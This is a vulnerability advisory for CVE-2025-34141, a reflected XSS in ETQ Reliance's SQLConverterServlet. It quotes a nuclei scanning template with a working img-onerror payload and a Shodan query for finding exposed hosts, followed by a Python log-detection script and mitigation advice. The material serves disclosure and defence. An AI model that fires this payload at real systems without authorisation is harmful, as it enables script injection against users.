ETQ Reliance Reflected XSS via SQLConverterServlet

Vulnerability Information

Vulnerability name: ETQ Reliance Reflected XSS via SQLConverterServlet

Vulnerability ID:

  • CVE: CVE-2025-34141

Vulnerability type: Cross-site scripting (XSS)

Severity: Medium

Vulnerability description: A reflected cross-site scripting (XSS) vulnerability exists in the SQLConverterServlet component of the ETQ Reliance CG (legacy) platform. It requires user interaction, such as clicking a crafted link, and may result in execution of unauthorized script in the user's context. The affected servlet was unnecessarily exposed to authenticated users and has been disabled in version SE.2025.1.

Affected product: ETQ Reliance CG is a quality management software platform widely used in enterprise services to track and manage quality processes. It is typically deployed on internal corporate networks as part of critical business applications.

Vulnerability explanation: This is a reflected cross-site scripting (XSS) vulnerability. Its technical root cause is that the SQLConverterServlet component does not properly validate and sanitize user input, so malicious script can be injected and executed. An attacker can construct a crafted URL and lure a user into clicking it, causing arbitrary JavaScript to run in the user's browser context.

Impact analysis: This vulnerability may allow an attacker to execute malicious script in the victim's browser, stealing session tokens, redirecting the user to a malicious site, or performing other malicious actions. Because user interaction is required, the attack is less automatable, but successful exploitation can have a serious impact on the affected organization's security. The vulnerability is flagged as requiring authentication, meaning an attacker must first obtain valid user credentials to exploit it.

Vendor: ETQ

Product: ETQ Reliance CG (legacy)

Affected versions: version < SE.2025.1

Search query: html:"ETQ Reliance"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/f2036aac7ae025bfe24a88eca51a570d7a1d385c/http%2Fcves%2F2025%2FCVE-2025-34141.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details


id: CVE-2025-34141

info:
  name: ETQ Reliance Reflected XSS via `SQLConverterServlet`
  author: slcyber,pdresearch
  severity: medium
  description: |
    A reflected cross-site scripting (XSS) vulnerability exists in ETQ Reliance CG (legacy) platform within the `SQLConverterServlet` component. This vulnerability requires user interaction, such as clicking a crafted link, and may result in execution of unauthorized scripts in the user's context. The affected servlet was unnecessarily exposed to authenticated users and has since been disabled in version SE.2025.1.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34141
    - https://slcyber.io/assetnote-security-research-center/how-we-accidentally-discovered-a-remote-code-execution-vulnerability-in-etq-reliance/
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"ETQ Reliance"
  tags: cve,cve2025,etq-reliance,xss

# Request 1 discovers the application context path from the redirect;
# request 2 is sent against that path, falling back to "reliance".
flow: |
  http(1)
  if(template.path){
    http(2)
  } else {
    set("path","reliance")
    http(2)
  }

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: header
        internal: true
        name: path
        group: 1
        regex:
          - 'Location: https?://.*?/(.*?)/'

  - raw:
      # Uses the context path extracted (or defaulted) by the flow above.
      - |
        GET /{{path}}/SQLConverterServlet?MySQLStm=%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '</textarea><img src=x onerror=alert(document.domain)>'
          - 'You have to start the ENGINE application before using this form.'
        condition: and
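Because the servlet reflects the MySQLStm query parameter into the page unescaped, exploitation attempts are visible in web-server access logs as requests to SQLConverterServlet whose decoded MySQLStm value contains HTML markup. The following detection script is an added example, not part of the nuclei template or of ETQ's code; the log lines are constructed samples in Common Log Format, and it flags any tag in the parameter (not only the probe string above), under any context path.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - jdoe [12/Jun/2025:10:01:22 +0000] "GET /reliance/SQLConverterServlet?MySQLStm=SELECT+1 HTTP/1.1" 200 512
10.0.0.9 - jdoe [12/Jun/2025:10:02:03 +0000] "GET /reliance/SQLConverterServlet?MySQLStm=%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1" 200 2048
10.0.0.9 - - [12/Jun/2025:10:02:30 +0000] "GET /reliance/ HTTP/1.1" 302 0
10.0.0.7 - asmith [12/Jun/2025:10:03:11 +0000] "GET /etq/SQLConverterServlet?MySQLStm=%3Cb%3Ex%3C%2Fb%3E HTTP/1.1" 200 2048
"""

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Any opening/closing tag in the decoded value. The servlet reflects MySQLStm
# into the page, so markup there (not just the known probe) is an XSS attempt.
MARKUP_RE = re.compile(r'<\s*/?\s*[a-z!?]', re.IGNORECASE)


def suspicious_requests(log_text):
    """Return (ip, user, decoded MySQLStm) for requests to SQLConverterServlet
    (under any context path) whose MySQLStm parameter contains markup."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable CLF line
        target = urlsplit(m.group('target'))
        if not target.path.endswith('/SQLConverterServlet'):
            continue
        # parse_qs percent-decodes values, so the check runs on the real text
        for value in parse_qs(target.query).get('MySQLStm', []):
            if MARKUP_RE.search(value):
                hits.append((m.group('ip'), m.group('user'), value))
    return hits


if __name__ == '__main__':
    for ip, user, payload in suspicious_requests(SAMPLE_LOG):
        print(f'{ip} user={user} MySQLStm={payload!r}')
```

Requests on the affected version should also be blocked upstream; the vendor's fix in SE.2025.1 disables the servlet entirely, and an equivalent stopgap is to deny access to the SQLConverterServlet path at the reverse proxy.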